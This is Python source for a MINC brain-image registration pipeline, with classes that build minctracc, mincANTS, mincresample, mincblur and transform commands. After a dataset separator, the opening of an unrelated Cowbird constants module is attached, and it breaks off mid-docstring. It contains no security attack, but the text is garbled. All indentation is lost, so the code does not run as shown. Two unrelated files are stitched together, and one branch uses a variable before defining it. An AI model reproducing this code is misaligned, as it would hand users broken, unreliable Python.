CmdStage.__init__(self, None) #don't do any arg processing in superclass
try:
if isFileHandler(inSource, inTarget):
"""Same defaults as minctracc class:
blur = None --> return lastblur
gradient = True --> return gradient instead of blur
if blur = -1 --> lastBaseVol returned and gradient ignored"""
self.source = []
self.target = []
# Need to check that length of blur, gradient, similarity, weight
# and radius_or_histo are the same
self.checkArrayLengths(blur,
gradient,
similarity_metric,
weight,
radius_or_histo)
for i in range(len(blur)):
self.source.append(inSource.getBlur(blur[i], gradient[i]))
self.target.append(inTarget.getBlur(blur[i], gradient[i]))
"""If no output transform is specified, use registerVolume to create a default.
If an output transform name is specified, use this as the output, and add it as the last xfm between source and target.
Note: The output file passed in must be a full path."""
if not output:
outputXfm = inSource.registerVolume(inTarget, defaultDir)
self.output = outputXfm
else:
self.output = output
inSource.addAndSetXfmToUse(inTarget, self.output)
self.logFile = fh.logFromFile(inSource.logDir, self.output)
self.useMask=useMask
if self.useMask:
self.target_mask = inTarget.getMask()
else:
self.source = inSource
self.target = inTarget
#MF TODO: Need to find a way to specify multiple source and targets
#based on blur and gradient
self.output = output
if not logFile:
self.logFile = fh.logFromFile(abspath(curdir), output)
else:
self.logFile = logFile
self.useMask=useMask
if self.useMask:
self.target_mask = target_mask
except:
print "Failed in putting together mincANTS command."
print "Unexpected error: ", sys.exc_info()
self.similarity_metric = similarity_metric
self.weight = weight
self.iterations = iterations
self.radius_or_histo = radius_or_histo
"""Single quotes needed on the command line for
transformation_model and regularization
"""
self.transformation_model = "'" + transformation_model + "'"
self.regularization = "'" + regularization + "'"
self.addDefaults()
self.finalizeCommand()
self.setName()
self.colour = "red"
def setName(self):
self.name = "mincANTS"
def addDefaults(self):
cmd = []
for i in range(len(self.similarity_metric)):
cmd.append("-m")
subcmd = ",".join([str(self.source[i]), str(self.target[i]),
str(self.weight[i]), str(self.radius_or_histo[i])])
cmd.append("".join(["'", str(self.similarity_metric[i]), "[", subcmd, "]", "'"]))
self.cmd = ["mincANTS", "3", "--number-of-affine-iterations", "0"]
for c in cmd:
self.cmd += [c]
self.cmd += ["-t", self.transformation_model,
"-r", self.regularization,
"-i", self.iterations,
"-o", self.output]
for i in range(len(self.source)):
self.inputFiles += [self.source[i], self.target[i]]
self.outputFiles = [self.output]
if self.useMask and self.target_mask:
self.cmd += ["-x", str(self.target_mask)]
self.inputFiles += [self.target_mask]
def finalizeCommand(self):
pass
def checkArrayLengths(self, blur, gradient, metric, weight, radius):
arrayLength = len(blur)
errorMsg = "Array lengths for mincANTS command do not match."
if (len(gradient) != arrayLength
or len(metric) != arrayLength
or len(weight) != arrayLength
or len(radius) != arrayLength):
print errorMsg
raise
else:
return
class minctracc(CmdStage):
def __init__(self,
inSource,
inTarget,
output=None,
logFile=None,
defaultDir="transforms",
blur=None,
gradient=False,
linearparam="nlin",
source_mask=None,
target_mask=None,
iterations=40,
step=0.5,
transform=None,
weight=0.8,
stiffness=0.98,
similarity=0.8,
w_translations=0.4,
w_rotations=0.0174533,
w_scales=0.02,
w_shear=0.02,
simplex=1,
optimization="-use_simplex",
useMask=True):
#MF TODO: Specify different w_translations, rotations, scales shear in each direction?
# Now assumes same in all directions
# Go to more general **kwargs?
"""an efficient way to add a minctracc call to a pipeline
The constructor needs two inputFile arguments, the source and the
target for the registration, and multiple optional arguments
for specifying parameters. The source and the target can be
specified as either RegistrationPipeFH instances or as strings
representing filenames. In the latter case an output and a
logfile filename are required as well (these are filled in
automatically in the case of RegistrationPipeFH instances.)
"""
CmdStage.__init__(self, None) #don't do any arg processing in superclass
try:
if isFileHandler(inSource, inTarget):
""" if blur = None, getBlur returns lastblur
if gradient is true, getBlur returns gradient instead of blur
if blur = -1, lastBaseVol is returned and gradient is ignored.
self.transform will be None if there is no previous transform
between input and target. If this is the case, lsq6 and lsq12
defaults are added in the setTransforms function
"""
self.source = inSource.getBlur(blur, gradient)
self.target = inTarget.getBlur(blur, gradient)
self.transform = inSource.getLastXfm(inTarget)
"""If no output transform is specified, use registerVolume to create a default.
If an output transform name is specified, use this as the output, and add it as the last xfm between source and target.
Note: The output file passed in must be a full path."""
if not output:
outputXfm = inSource.registerVolume(inTarget, defaultDir)
self.output = outputXfm
else:
self.output = output
inSource.addAndSetXfmToUse(inTarget, self.output)
outputXfm = output
self.logFile = fh.logFromFile(inSource.logDir, outputXfm)
self.useMask = useMask
if self.useMask:
self.source_mask = inSource.getMask()
self.target_mask = inTarget.getMask()
else:
self.source = inSource
self.target = inTarget
self.output = output
if not logFile:
self.logFile = fh.logFromFile(abspath(curdir), output)
else:
self.logFile = logFile
self.transform = transform
self.useMask = useMask
if self.useMask:
self.source_mask = source_mask
self.target_mask = target_mask
except:
print "Failed in putting together minctracc command."
print "Unexpected error: ", sys.exc_info()
self.linearparam = linearparam
self.iterations = str(iterations)
self.lattice_diameter = str(step*3.0)
self.step = str(step)
self.weight = str(weight)
self.stiffness = str(stiffness)
self.similarity = str(similarity)
self.w_translations = str(w_translations)
self.w_rotations = str(w_rotations)
self.w_scales = str(w_scales)
self.w_shear = str(w_shear)
self.simplex = str(simplex)
self.optimization = str(optimization)
self.addDefaults()
self.finalizeCommand()
self.setTransform()
self.setName()
self.colour = "red"
def setName(self):
if self.linearparam == "nlin":
self.name = "minctracc nlin step: " + self.step
else:
self.name = "minctracc" + self.linearparam + " "
def addDefaults(self):
self.cmd = ["minctracc",
"-clobber",
"-w_translations", self.w_translations,self.w_translations,self.w_translations,
"-w_rotations", self.w_rotations, self.w_rotations, self.w_rotations,
"-w_scales", self.w_scales, self.w_scales, self.w_scales,
"-w_shear", self.w_shear, self.w_shear, self.w_shear,
"-step", self.step, self.step, self.step,
"-simplex", self.simplex, self.optimization,
"-tol", str(0.0001),
self.source,
self.target,
self.output]
# adding inputs and outputs
self.inputFiles = [self.source, self.target]
if self.useMask:
if self.source_mask:
self.inputFiles += [self.source_mask]
self.cmd += ["-source_mask", self.source_mask]
if self.target_mask:
self.inputFiles += [self.target_mask]
self.cmd += ["-model_mask", self.target_mask]
self.outputFiles = [self.output]
def setTransform(self):
"""If there is no last transform between the input and target (if using file handlers)
or if there is no transform specified as an argument (if not using file handlers)
set defaults based on linear parameter. If a transform is specified, use that one.
Note that nothing is specified for nonlinear registrations with no transform,
the minctracc defaults are fine.
"""
if not self.transform:
if self.linearparam == "lsq6":
self.cmd += ["-est_center", "-est_translations"]
elif self.linearparam == "lsq12" or self.linearparam=="nlin" or self.linearparam == "lsq6-identity":
self.cmd += ["-identity"]
else:
self.inputFiles += [self.transform]
self.cmd += ["-transform", self.transform]
def finalizeCommand(self):
"""add the options to finalize the command"""
if self.linearparam == "nlin":
"""add options for non-linear registration"""
self.cmd += ["-iterations", self.iterations,
"-similarity", self.similarity,
"-weight", self.weight,
"-stiffness", self.stiffness,
"-nonlinear", "corrcoeff", "-sub_lattice", "6",
"-lattice_diameter", self.lattice_diameter,
self.lattice_diameter, self.lattice_diameter,
"-max_def_magnitude", str(1),
"-debug", "-xcorr"]
else:
#MF TODO: Enforce that options must be lsq6/7/9/12?
"""add the options for a linear fit"""
if self.linearparam == "lsq6-identity":
_numCmd = "-" + "lsq6"
else:
_numCmd = "-" + self.linearparam
self.cmd += ["-xcorr", _numCmd]
class blur(CmdStage):
def __init__(self,
inFile,
fwhm,
defaultDir="tmp",
gradient=False):
"""calls mincblur with the specified 3D Gaussian kernel
The inputs can be in one of two styles. The first argument can
be an instance of RegistrationPipeFH, in which case the last
volume in that instance (i.e. inFile.lastBasevol) will be
blurred and the output will be determined by its blurFile
method. Alternately, the inFile can be a string representing a
filename, in which case the output and logfile will be set based on
the inFile name. If the fwhm specified is -1, we do not construct
a command.
"""
if fwhm == -1:
return
CmdStage.__init__(self, None)
try:
if isFileHandler(inFile):
blurlist = inFile.blurFile(fwhm, gradient, defaultDir)
self.base = blurlist["base"]
self.inputFiles = [inFile.getLastBasevol()]
self.outputFiles = [blurlist["file"]]
self.logFile = blurlist["log"]
self.name = "mincblur " + str(fwhm) + " " + inFile.basename
if gradient:
self.outputFiles.append(blurlist["gradient"])
else:
self.base = str(inFile).replace(".mnc", "")
self.inputFiles = [inFile]
blurBase = "".join([self.base, "_fwhm", str(fwhm), "_blur"])
output = "".join([blurBase, ".mnc"])
self.outputFiles = [output]
self.logFile = fh.logFromFile(abspath(curdir), output)
self.name = "mincblur " + str(fwhm) + " " + basename(inFile)
if gradient:
gradientBase = blurBase.replace("blur", "dxyz")
self.outputFiles += ["".join([gradientBase, ".mnc"])]
except:
print "Failed in putting together blur command."
print "Unexpected error: ", sys.exc_info()
self.cmd = ["mincblur", "-clobber", "-no_apodize", "-fwhm", str(fwhm),
self.inputFiles[0], self.base]
if gradient:
self.cmd += ["-gradient"]
self.colour="blue"
class autocrop(CmdStage):
def __init__(self,
resolution,
inFile,
output=None,
logFile=None,
defaultDir="resampled"):
"""Resamples the input file to the resolution specified
using autocrop. The -resample flag forces the use of
mincresample.
Resolutions should be specified in mm.
e.g. 56 microns should be specified as 0.056
"""
CmdStage.__init__(self, None)
self.resolution = str(resolution)
try:
if isFileHandler(inFile):
self.inFile = inFile.getLastBasevol()
self.outfile = self.setOutputFile(inFile, defaultDir)
self.logFile = fh.logFromFile(inFile.logDir, self.outfile)
else:
self.inFile = inFile
self.outfile = output
if not logFile:
self.logFile = fh.logFromFile(abspath(curdir), output)
else:
self.logFile = logFile
except:
print "Failed in putting together autocrop command"
print "Unexpected error: ", sys.exc_info()
self.addDefaults()
self.finalizeCommand()
self.setName()
def addDefaults(self):
self.inputFiles += [self.inFile]
self.outputFiles += [self.outfile]
self.cmd += ["autocrop",
"-resample",
"-isostep", self.resolution]
def finalizeCommand(self):
self.cmd += ["-clobber", self.inFile, self.outfile]
def setName(self):
self.name = "autocrop "
def setOutputFile(self, inFile, defaultDir):
outDir = inFile.setOutputDirectory(defaultDir)
outBase = (fh.removeBaseAndExtension(inFile.getLastBasevol()) + "_"
+ self.resolution + "res.mnc")
outputFile = fh.createBaseName(outDir, outBase)
inFile.setLastBasevol(outputFile)
return(outputFile)
class mincresampleFileAndMask(object):
"""
If the input file to mincresample(CmdStage) is a file handler, and there is
a mask associated with the file, the most intuitive thing to do is
to resample both the file and the mask. However, a true atom/command stage
can only create a single stage, and a such mincresample(CmdStage) can not
resample both. When using a file handler, the mask file associated with it
is used behind the scenes without the user explicitly specifying this behaviour.
That's why it is important that the mask always remains current/up-to-date. The
best way to do that is to automatically resample the associated mask when the
main file is being resampled. And that is where this class comes in. It serves
as a wrapper around mincresample(CmdStage) and mincresampleMask(CmdStage). It
will check whether the input file is a file handler, and if so, will resample
the mask that is associated with it (if it exists).
This class is not truly an atom/command stage, so technically should not live in
the minc_atoms module. It is still kept here because in essence it serves as a
single indivisible stage. (and because the user is more likely to call/find it
when looking for the mincresample stage)
"""
def __init__(self,
inFile,
targetFile,
nameForStage=None,
**kwargs):
self.p = Pipeline()
self.outputFiles = [] # this will contain the outputFiles from the mincresample of the main MINC file
self.outputFilesMask = [] # this will contain the outputFiles from the mincresample of the mask belonging to the main MINC file
# the first step is to simply run the mincresample command:
fileRS = mincresample(inFile,
targetFile,
**kwargs)
if(nameForStage):
fileRS.name = nameForStage
self.p.addStage(fileRS)
self.outputFiles = fileRS.outputFiles
# initialize the array of outputs for the mask in case there is none to be resampled
self.outputFilesMask = [None] * len(self.outputFiles)
# next up, is this a file handler, and if so is there a mask that needs to be resampled?
if(isFileHandler(inFile)):
if(inFile.getMask()):
# there is a mask associated with this file, should be updated
# we have to watch out in terms of interpolation arguments, if
# the original resample command asked for "-sinc" or "-tricubic"
# for instance, we should remove that argument for the mask resampling
# these options would reside in the argArray...
maskArgs = copy.deepcopy(kwargs)
if maskArgs.has_key("argArray"):
argList = maskArgs["argArray"]
for i in range(len(argList)):
if(re.match("-sinc", argList[i]) or
re.match("-trilinear", argList[i]) or
re.match("-tricubic", argList[i]) ):
del argList[i]
maskArgs["argArray"] = argList
# if the output file for the mincresample command was already
# specified, add "_mask.mnc" to it
if maskArgs.has_key("output"):
maskArgs["output"] = re.sub(".mnc", "_mask.mnc", maskArgs["output"])
maskRS = mincresampleMask(inFile,
targetFile,
**maskArgs)
if(nameForStage):
maskRS.name = nameForStage + "--mask--"
self.p.addStage(maskRS)
self.outputFilesMask = maskRS.outputFiles
class mincresample(CmdStage):
def __init__(self,
inFile,
targetFile,
**kwargs):
"""calls mincresample with the specified options
The inFile and likeFile can be in one of two styles.
The first argument can be an instance of RegistrationPipeFH.
In this case the last volume in that instance (i.e. inFile.lastBasevol)
will be resampled and the output will be determined accordingly.
Alternatively, the inFile can be a string representing a
filename, in which case the output and logfile will be set based on
the inFile name.
inFile is required, everything else optional
This class assuming use of the most commonly used flags (-2, -clobber, -like, -transform)
Any commands above and beyond the standard will be read in from argarray
argarray could contain inFile and/or output files
"""
argArray = kwargs.pop("argArray", None)
if not argArray:
CmdStage.__init__(self, ["mincresample"])
else:
CmdStage.__init__(self, ["mincresample"] + argArray)
try:
#MF TODO: What if we don't want to use lastBasevol?
if isFileHandler(inFile, targetFile):
self.inFile = self.getFileToResample(inFile, **kwargs)
self.targetFile = targetFile.getLastBasevol()
likeFile=kwargs.pop("likeFile", None)
if likeFile:
if isFileHandler(likeFile):
self.likeFile = likeFile.getLastBasevol()
else:
print "likeFile must be RegistrationPipeFH or RegistrationFHBase."
raise
invert = False
for cmd in self.cmd:
if fnmatch.fnmatch(cmd, "*-invert*"):
invert = True
break
xfm = kwargs.pop("transform", None)
if xfm:
self.cxfm = xfm
else:
if invert:
self.cxfm = targetFile.getLastXfm(inFile)
else:
self.cxfm = inFile.getLastXfm(targetFile)
self.outputLocation=kwargs.pop("outputLocation", None)
if not self.outputLocation:
self.outputLocation=inFile
else:
if not isFileHandler(self.outputLocation):
print "outputLocation must be RegistrationPipeFH or RegistrationFHBase."
raise
default = kwargs.pop("defaultDir", None)
if not default:
defaultDir = "resampled"
else:
defaultDir = default
"""If an output file is specified, then use it, else create a default file name.
Note: The output file passed in must be a full path."""
output = kwargs.pop("output", None)
if not output:
self.outfile = self.setOutputFile(self.outputLocation, defaultDir)
else:
self.outfile = output
self.logFile = fh.logFromFile(self.outputLocation.logDir, self.outfile)
else:
self.inFile = inFile
self.targetFile = targetFile
self.likeFile = kwargs.pop("likeFile", None)
self.cxfm = kwargs.pop("transform", None)
self.outfile=kwargs.pop("output", None)
logFile=kwargs.pop("logFile", None)
if not logFile:
self.logFile = fh.logFromFile(abspath(curdir), self.outfile)
else:
self.logFile = logFile
except:
print "Failed in putting together resample command"
print "Unexpected error: ", sys.exc_info()
self.addDefaults()
self.finalizeCommand()
self.setName()
if isFileHandler(inFile, targetFile):
self.setLastResampledFile()
def addDefaults(self):
self.inputFiles += [self.inFile, self.targetFile]
self.outputFiles += [self.outfile]
if self.likeFile:
self.cmd += ["-like", self.likeFile]
if not self.likeFile in self.inputFiles:
self.inputFiles += [self.likeFile]
if self.cxfm:
self.inputFiles += [self.cxfm]
self.cmd += ["-transformation", self.cxfm]
def finalizeCommand(self):
"""Add -2, clobber, input and output files """
self.cmd += ["-2", "-clobber", self.inFile, self.outfile]
def setName(self):
self.name = "mincresample "
def setOutputFile(self, FH, defaultDir):
outBase = fh.removeBaseAndExtension(self.cxfm) + "-resampled.mnc"
outDir = FH.setOutputDirectory(defaultDir)
return(fh.createBaseName(outDir, outBase))
def getFileToResample(self, inputFile, **kwargs):
return(inputFile.getLastBasevol())
def setLastResampledFile(self):
# We want to keep track of the last file that was resampled. This can be
# useful when we want to set the lastBaseVol or mask related to this file
# handler. This function needs to be overridden by the children of this
# class, because depending on what we resample (main file, mask, labels)
# a different "setLast...Vol" needs to be called.
#
# For the main mincresample class, it should be the setLastResampledVol
self.outputLocation.setLastResampledVol(self.outputFiles[0])
class mincresampleLabels(mincresample):
def __init__(self,
inFile,
targetFile,
**kwargs):
self.initInputLabels(kwargs.pop("setInputLabels", None))
mincresample.__init__(self,
inFile,
targetFile,
**kwargs)
if isFileHandler(self.outputLocation):
#After other initialization, addLabels to appropriate array
self.addLabelsToArray(self.outputLocation)
def initInputLabels(self, setLabels):
if setLabels:
self.setInputLabels = setLabels
else:
self.setInputLabels = False
def finalizeCommand(self):
"""additional arguments needed for resampling labels"""
self.cmd += ["-keep_real_range", "-nearest_neighbour"]
mincresample.finalizeCommand(self)
def setOutputFile(self, FH, defaultDir):
"""set name of output and add labels to appropriate likeFile labels array"""
outBase = self.setOutputFileName(FH, append="labels")
outDir = FH.setOutputDirectory(defaultDir)
return(fh.createBaseName(outDir, outBase))
def setOutputFileName(self, FH, **funcargs):
endOfFile = "-" + funcargs["append"] + ".mnc"
if self.setInputLabels:
outBase = fh.removeBaseAndExtension(self.cxfm)
if fnmatch.fnmatch(outBase, "*_minctracc_*"):
outputName = outBase.split("_minctracc_")[0]
elif fnmatch.fnmatch(outBase, "*_ANTS_*"):
outputName = outBase.split("_ANTS_")[0]
else:
outputName = outBase
outBase = outputName + "-input"
else:
labelsToResample = fh.removeBaseAndExtension(self.inFile)
likeBaseVol = fh.removeBaseAndExtension(FH.getLastBasevol())
outBase = labelsToResample + "_to_" + likeBaseVol
outBase += endOfFile
return outBase
def addLabelsToArray(self, FH):
FH.addLabels(self.outfile, inputLabel=self.setInputLabels)
def getFileToResample(self, inputFile, **kwargs):
index = kwargs.pop("labelIndex", None)
if index > -1:
# We always resample from inputLabels, so use returnLabels(True)
labelArray=inputFile.returnLabels(True)
else:
labelArray[index] = None
return(labelArray[index])
def setLastResampledFile(self):
# Currently we do not keep track of the last label file that is
# resampled
pass
class mincresampleMask(mincresampleLabels):
def __init__(self,
inFile,
targetFile,
**kwargs):
mincresampleLabels.__init__(self,
inFile,
targetFile,
**kwargs)
def getFileToResample(self, inputFile, **kwargs):
#MF TODO: We will have to adjust this if we allow for pairwise
# crossing to calculate masks.
""" Assume we are using mask from inputFile. If this does not exist,
we assume inputLabels are also masks from previous iteration
and we can use same logic as for mask=False.
"""
maskToUse = inputFile.getMask()
if maskToUse:
return maskToUse
else:
index = kwargs.pop("labelIndex", None)
labelArray=inputFile.returnLabels(True)
return(labelArray[index])
def setOutputFile(self, FH, defaultDir):
# add -mask to appended file
outBase = self.setOutputFileName(FH, append="mask")
outDir = FH.setOutputDirectory(defaultDir)
return(fh.createBaseName(outDir, outBase))
def setLastResampledFile(self):
# Instead of setting the LastResampledVol, here we need to set the
# LastResampledMaskVol
self.outputLocation.setLastResampledMaskVol(self.outputFiles[0])
class mincAverage(CmdStage):
def __init__(self,
inputArray,
outputAvg,
output=None,
logFile=None,
defaultDir="tmp"):
CmdStage.__init__(self, None)
try:
"""If output is fileHandler, we assume input array is as well"""
if isFileHandler(outputAvg):
self.filesToAvg = []
for i in range(len(inputArray)):
self.filesToAvg.append(inputArray[i].getLastBasevol())
"""If no output file is specified, create default, using file handler
otherwise use what is specified."""
if not output:
self.output = self.setOutputFile(outputAvg, defaultDir)
else:
self.output = output
self.logFile = fh.logFromFile(outputAvg.logDir, self.output)
else:
self.filesToAvg = inputArray
self.output = outputAvg
if not logFile:
self.logFile = fh.logFromFile(abspath(curdir), outputAvg)
else:
self.logFile = logFile
except:
print "Failed in putting together mincaverage command"
print "Unexpected error: ", sys.exc_info()
self.addDefaults()
self.finalizeCommand()
self.setName()
def addDefaults(self):
for i in range(len(self.filesToAvg)):
self.inputFiles.append(self.filesToAvg[i])
self.sd = splitext(self.output)[0] + "-sd.mnc"
self.outputFiles += [self.output, self.sd]
self.cmd += ["mincaverage",
"-clobber", "-normalize", "-sdfile", self.sd, "-max_buffer_size_in_kb", str(409620)]
def finalizeCommand(self):
for i in range(len(self.filesToAvg)):
self.cmd.append(self.filesToAvg[i])
self.cmd.append(self.output)
def setName(self):
self.name = "mincaverage "
def setOutputFile(self, inFile, defaultDir):
outDir = inFile.setOutputDirectory(defaultDir)
outBase = (fh.removeBaseAndExtension(inFile.getLastBasevol()) + "_" + "avg.mnc")
outputFile = fh.createBaseName(outDir, outBase)
return(outputFile)
class mincAverageDisp(mincAverage):
def __init__(self,
inputArray,
output,
logFile=None,
defaultDir=None):
mincAverage.__init__(self, inputArray,output,logFile=logFile,defaultDir=defaultDir)
def addDefaults(self):
for i in range(len(self.filesToAvg)):
self.inputFiles.append(self.filesToAvg[i])
self.outputFiles += [self.output]
self.cmd += ["mincaverage", "-clobber"]
class RotationalMinctracc(CmdStage):
"""
This class runs a rotational_minctracc.py call on its two input
files. That program performs a 6 parameter (rigid) registration
by doing a brute force search in the x,y,z rotation space. Normally
the input files have unknown orientation. Input and output files
can be specified either as file handlers, or as string representing
the filenames.
* The input files are assumed to have already been blurred appropriately
There are a number of parameters that have to be set and this
will be done using factors that depend on the resolution of the
input files. The blur parameter is given in mm, not as a factor
of the input resolution. The blur parameter is necessary in order
to retrieve the correct blur file from the file handler. Here is the list:
argument to be set -- default (factor) -- (for 56 micron, translates to)
blur 0.56 (mm) (560 micron) (note, this is in mm, not a factor)
resample stepsize 4 (224 micron)
registration stepsize 10 (560 micron)
w_translations 8 (448 micron)
Specifying -1 for the blur argument will result in retrieving an unblurred file.
The two other parameters that can be set are (in degrees) have defaults:
rotational range 50
rotational interval 10
Whether or not a mask will be used is based on the presence of a mask
in the target file. Alternatively, a mask can be specified using the
maskFile argument.
"""
def __init__(self,
inSource,
inTarget,
output = None, # ability to specify output transform when using strings for input
logFile = None,
maskFile = None,
defaultDir="transforms",
blur=0.56,
resample_step=4,
registration_step=10,
w_translations=8,
rotational_range=50,
rotational_interval=10,
mousedata=False):
CmdStage.__init__(self, None) #don't do any arg processing in superclass
# handling of the input files
try:
if rf.isFileHandler(inSource, inTarget):
self.source = inSource.getBlur(fwhm=blur)
self.target = inTarget.getBlur(fwhm=blur)
if(output == None):
self.output = inSource.registerVolume(inTarget, defaultDir)
else:
self.output = output
if(logFile == None):
self.logFile = fh.logFromFile(inSource.logDir, self.output)
else:
self.logFile = logFile
else:
# TODO: fix this to work with string input files
self.source = inSource
self.target = inTarget
except:
print "Failed in putting together RotationalMinctracc command."
print "Unexpected error: ", sys.exc_info()
raise
highestResolution = rf.returnFinestResolution(inSource)
# TODO: finish the following if clause... hahaha
#if(mousedata):
self.addDefaults(resample_step * highestResolution,
registration_step * highestResolution,
w_translations * highestResolution,
int(rotational_range),
int(rotational_interval))
# potentially add a mask to the command
self.finalizeCommand(inTarget, maskFile)
self.setName()
self.colour = "green"
def setName(self):
self.name = "rotational-minctracc"
def addDefaults(self,
resamp_step,
reg_step,
w_trans,
rot_range,
rot_interval):
w_trans_string = str(w_trans) + ',' + str(w_trans) + ',' + str(w_trans)
cmd = ["rotational_minctracc.py",
"-t", "/dev/shm/",
"-w", w_trans_string,
"-s", str(resamp_step),
"-g", str(reg_step),
"-r", str(rot_range),
"-i", str(rot_interval),
self.source,
self.target,
self.output,
"/dev/null"]
self.inputFiles = [self.source, self.target]
self.outputFiles = [self.output]
self.cmd = cmd
def finalizeCommand(self,
inTarget,
maskFile):
if(maskFile):
# a mask file have been given directly, choose
# this one over the potential mask present
# in the target
self.cmd += ["-m", maskFile]
self.inputFiles.append(maskFile)
else:
try:
mask = inTarget.getMask()
if mask:
self.cmd += ["-m", mask]
self.inputFiles.append(mask)
except:
print "Failed retrieving information about a mask for the target in RotationalMinctracc."
print "Unexpected error: ", sys.exc_info()
raise
class xfmConcat(CmdStage):
"""
Calls xfmconcat on one or more input transformations
inputFiles: these are assumed to be passed in as input filename
strings. If more than one input file is passed, they should be
passed as a list
outputFile: string representing the output filename
logFile: string representing the output filename for the log
file for this command. If unspecified, self.logFile will be set in
CmdStage.__init__ (or subsequently, using the setLogFile function)
"""
def __init__(self,
inputFiles,
outputFile,
logFile=None):
CmdStage.__init__(self, None)
# in case there is a single input file... (it's actually possible)
if(not(type(inputFiles) is list)):
inputFiles = [inputFiles]
self.inputFiles = inputFiles
self.outputFiles = [outputFile]
self.logFile = logFile
self.cmd = ["xfmconcat", "-clobber"]
self.cmd += inputFiles
self.cmd += [outputFile]
self.name = "xfm-concat"
self.colour = "yellow"
class xfmInvert(CmdStage):
"""
Calls xfminvert on a single input transformation
__init__ arguments:
Required: 1. xfm: string representing the full path of the transform to be inverted
Optional: 2. FH: fileHandler for assigning location for output and logFiles
3. logFile (used only if a file handler is not specified. If both a logFile
and file handler are specified, the logFile is ignored. If the logFile and FH
are both unspecified, self.logFile will be set in CmdStage.__init__
(or subsequently, using the setLogFile function)
"""
def __init__(self,
xfm,
FH=None,
logFile=None):
CmdStage.__init__(self, None)
try:
self.xfm = xfm
if isFileHandler(FH):
invXfmBase = fh.removeBaseAndExtension(self.xfm).split(".xfm")[0]
self.output = fh.createBaseName(FH.transformsDir, invXfmBase + "_inverted.xfm")
self.logFile = fh.logFromFile(FH.logDir, self.output)
else:
invXfmBase = splitext(self.xfm)[0]
self.output = invXfmBase + "_inverted.xfm"
if logFile:
self.logFile = logFile
except:
print "Failed in putting together xfminvert command"
print "Unexpected error: ", sys.exc_info()
self.finalizeCommand()
self.setName()
def finalizeCommand(self):
self.inputFiles.append(self.xfm)
self.outputFiles.append(self.output)
self.cmd += ["xfminvert", "-clobber", self.xfm, self.output]
def setName(self):
self.name = "xfminvert "
| StarcoderdataPython |
51282 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Constant settings for Cowbird application.
Constants defined with format ``COWBIRD_[VARIABLE_NAME]`` can be matched with corresponding
settings formatted as ``cowbird.[variable_name]`` in the ``cowbird.ini`` configuration file.
.. note::
Since the ``cowbird.ini`` file has to be loaded by the application to retrieve various configuration settings,
constant ``COWBIRD_INI_FILE_PATH`` (or any other `path variable` defined before it - see below) has to be defined
by environment variable if the default location is not desired (ie: if you want to provide your own configuration).
"""
import logging
import os
import re
from typing import TYPE_CHECKING
from pyramid.settings import asbool
from pyramid.threadlocal import get_current_registry
if TYPE_CHECKING:
# pylint: disable=W0611,unused-import
from typing import Optional
from cowbird.typedefs import AnySettingsContainer, SettingValue
# ===========================
# path variables
# ===========================
COWBIRD_MODULE_DIR = os.path.abspath(os.path.dirname(__file__))
COWBIRD_ROOT = os.path.dirname(COWBIRD_MODULE_DIR)
COWBIRD_CONFIG_DIR = os.getenv(
"COWBIRD_CONFIG_DIR", os.path.join(COWBIRD_ROOT, "config"))
COWBIRD_CONFIG_PATH = os.getenv("COWBIRD_CONFIG_PATH") # default None, require explicit specification
COWBIRD_INI_FILE_PATH = os.getenv(
"COWBIRD_INI_FILE_PATH", "{}/cowbird.ini".format(COWBIRD_CONFIG_DIR))
def _get_default_log_level():
"""
Get logging level from INI configuration file or fallback to default ``INFO`` if it cannot be retrieved.
"""
_default_log_lvl = "INFO"
try:
from cowbird.utils import get_settings_from_config_ini # pylint: disable=C0415 # avoid circular import error
_settings = get_settings_from_config_ini(COWBIRD_INI_FILE_PATH, section="logger_cowbird")
_default_log_lvl = _settings.get("level", _default_log_lvl)
# also considers 'ModuleNotFoundError' derived from 'ImportError', but not added to avoid Python <3.6 name error
except (AttributeError, ImportError): # noqa: W0703 # nosec: B110
pass
return _default_log_lvl
# ===========================
# variables from cowbird.env
# ===========================
# ---------------------------
# COWBIRD
# ---------------------------
COWBIRD_URL = os.getenv("COWBIRD_URL", None) # must be defined
COWBIRD_LOG_LEVEL = os.getenv("COWBIRD_LOG_LEVEL", _get_default_log_level()) # log level to apply to the loggers
COWBIRD_LOG_PRINT = asbool(os.getenv("COWBIRD_LOG_PRINT", False)) # log also forces print to the console
COWBIRD_LOG_REQUEST = asbool(os.getenv("COWBIRD_LOG_REQUEST", True)) # log detail of every incoming request
COWBIRD_LOG_EXCEPTION = asbool(os.getenv("COWBIRD_LOG_EXCEPTION", True)) # log detail of generated exceptions
COWBIRD_ADMIN_PERMISSION = "admin"
# ===========================
# constants
# ===========================
# ignore matches of settings and environment variables for following cases
COWBIRD_CONSTANTS = [
"COWBIRD_CONSTANTS",
"COWBIRD_MODULE_DIR",
"COWBIRD_ROOT",
"COWBIRD_ADMIN_PERMISSION",
# add more as needed
]
# ===========================
# utilities
# ===========================
_REGEX_ASCII_ONLY = re.compile(r"\W|^(?=\d)")
_SETTING_SECTION_PREFIXES = [
"cowbird",
]
_SETTINGS_REQUIRED = [
"COWBIRD_URL",
# FIXME: add others here as needed
]
def get_constant_setting_name(name):
"""
Find the equivalent setting name of the provided environment variable name.
Lower-case name and replace all non-ascii chars by `_`.
Then, convert known prefixes with their dotted name.
"""
name = re.sub(_REGEX_ASCII_ONLY, "_", name.strip().lower())
for prefix in _SETTING_SECTION_PREFIXES:
known_prefix = "{}_".format(prefix)
dotted_prefix = "{}.".format(prefix)
if name.startswith(known_prefix):
return name.replace(known_prefix, dotted_prefix, 1)
return name
def get_constant(constant_name, # type: str
settings_container=None, # type: Optional[AnySettingsContainer]
settings_name=None, # type: Optional[str]
default_value=None, # type: Optional[SettingValue]
raise_missing=True, # type: bool
print_missing=False, # type: bool
raise_not_set=True # type: bool
): # type: (...) -> SettingValue
"""
Search in order for matched value of :paramref:`constant_name`:
1. search in :py:data:`COWBIRD_CONSTANTS`
2. search in settings if specified
3. search alternative setting names (see below)
4. search in :mod:`cowbird.constants` definitions
5. search in environment variables
Parameter :paramref:`constant_name` is expected to have the format ``COWBIRD_[VARIABLE_NAME]`` although any value
can be passed to retrieve generic settings from all above mentioned search locations.
If :paramref:`settings_name` is provided as alternative name, it is used as is to search for results if
:paramref:`constant_name` was not found. Otherwise, ``cowbird.[variable_name]`` is used for additional search when
the format ``COWBIRD_[VARIABLE_NAME]`` was used for :paramref:`constant_name`
(i.e.: ``COWBIRD_ADMIN_USER`` will also search for ``cowbird.admin_user`` and so on for corresponding constants).
:param constant_name: key to search for a value
:param settings_container: WSGI application settings container (if not provided, uses found one in current thread)
